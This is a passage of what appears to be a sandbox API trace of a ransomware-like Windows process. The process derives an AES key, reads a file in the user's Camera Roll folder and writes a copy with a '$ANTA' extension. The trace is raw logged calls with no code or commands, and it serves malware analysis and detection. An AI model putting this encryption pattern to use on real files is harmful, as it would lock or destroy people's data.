cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0091.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca8e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0091.603] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac440, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac2c0) returned 1 [0091.603] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0091.603] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0091.603] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0091.603] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0091.603] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0091.603] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0091.603] PeekMessageW (in: lpMsg=0x144e65c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e65c) returned 0 [0091.603] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0091.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0091.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796f28, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0091.604] CryptDestroyHash (hHash=0x41ac440) returned 1 [0091.604] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0091.604] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0091.604] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0091.604] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0091.604] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0091.604] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Camera Roll\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\pictures\\camera roll\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0091.604] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.604] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0091.604] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0091.605] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0091.605] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0091.605] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Camera Roll\\" (normalized: "c:\\users\\fd1hvy\\pictures\\camera roll")) returned 0x11 [0091.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0091.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0091.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0091.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0091.605] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Camera Roll\\desktop.ini.$ANTA" (normalized: "c:\\users\\fd1hvy\\pictures\\camera roll\\desktop.ini.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0091.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0091.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0091.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0091.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0091.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0091.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0091.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0091.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0091.606] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0091.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0091.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0091.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0091.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0091.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0091.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0091.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0091.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0091.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0091.607] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0091.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0091.607] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0091.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0091.607] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0091.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0091.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0091.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0091.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0091.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0091.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0091.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0091.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0091.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0091.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0091.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0091.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0091.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0091.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0091.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0091.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e06020 [0091.612] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0091.612] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0xbe, lpOverlapped=0x0) returned 1 [0091.613] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0091.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0091.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0091.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0091.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0091.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xbe) returned 0x1b218f0 [0091.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e06020 | out: hHeap=0x1780000) returned 1 [0091.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0091.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0091.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0091.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0091.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0091.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xbe) returned 0x43ebae0 [0091.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b218f0 | out: hHeap=0x1780000) returned 1 [0091.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0091.617] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0091.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0091.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0091.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0091.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0091.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0091.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xbe) returned 0x43eb888 [0091.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0091.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eb888 | out: hHeap=0x1780000) returned 1 [0091.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0091.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0091.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0091.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0091.618] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0091.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0091.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0091.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0091.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0091.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0091.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0091.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0091.618] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0091.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0091.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0091.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0091.618] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0091.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0091.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0091.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0091.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2530 [0091.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0091.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0091.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0091.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0091.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xbe) returned 0x43eba18 [0091.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0091.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26e0 [0091.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0091.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0091.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0091.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2540 [0091.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0091.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0091.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0091.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26a0 [0091.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0091.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0091.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0091.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4a8 [0091.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0091.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0091.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0091.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0091.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0091.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xbe) returned 0x43ec5d0 [0091.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0091.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0091.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0091.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0091.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0091.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0091.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0091.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0091.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0091.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0091.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0091.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0091.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0091.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0091.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0091.620] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0091.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0091.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0091.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0091.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0091.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0091.620] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0091.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0091.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0091.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0091.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0091.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0091.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0091.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0091.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0091.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0091.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0091.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0091.621] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0091.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0091.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0091.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0091.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2690 [0091.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0091.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0091.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0091.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0091.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca610 [0091.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0091.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0091.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0091.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0091.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0091.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0091.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0091.622] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0091.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0091.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0091.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0091.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0091.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0091.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0091.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0091.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0091.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0091.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0091.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0091.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0091.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0091.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0091.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0091.622] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0091.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0091.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0091.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0091.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0091.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0091.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0091.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0091.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0091.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0091.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0091.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0091.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0091.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 